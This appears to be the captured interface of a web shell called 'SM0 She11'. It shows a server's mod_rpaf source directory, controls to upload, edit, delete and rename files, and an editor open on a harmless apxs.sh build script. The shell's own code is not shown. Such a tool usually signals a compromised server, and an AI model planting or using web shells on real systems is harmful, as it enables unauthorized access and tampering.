SM0 She11
Path:
/
/
usr
/
local
/
src
/
mod_rpaf-0.8.4
Full Path (server): /usr/local/src/mod_rpaf-0.8.4
Create Fil3
Upl04d Fil3
📁 .libs
Open
[D]
[R]
📄 CHANGES
[E]
[D]
[R]
📄 Makefile
[E]
[D]
[R]
📄 README.md
[E]
[D]
[R]
📄 apxs.sh
[E]
[D]
[R]
📄 mod_rpaf.c
[E]
[D]
[R]
📄 mod_rpaf.la
[E]
[D]
[R]
📄 mod_rpaf.lo
[E]
[D]
[R]
📄 mod_rpaf.o
[E]
[D]
[R]
📄 mod_rpaf.slo
[E]
[D]
[R]
📄 mod_rpaf.spec
[E]
[D]
[R]
Editing: apxs.sh
#!/bin/sh APXS=`which apxs2 2>/dev/null` if [ -z "$APXS" ]; then APXS=`which apxs 2>/dev/null` fi if [ -z "$APXS" ]; then if [ -f /usr/sbin/apxs2 ]; then APXS=/usr/sbin/apxs2 elif [ -f /usr/sbin/apxs ]; then APXS=/usr/sbin/apxs fi fi $APXS $@
Save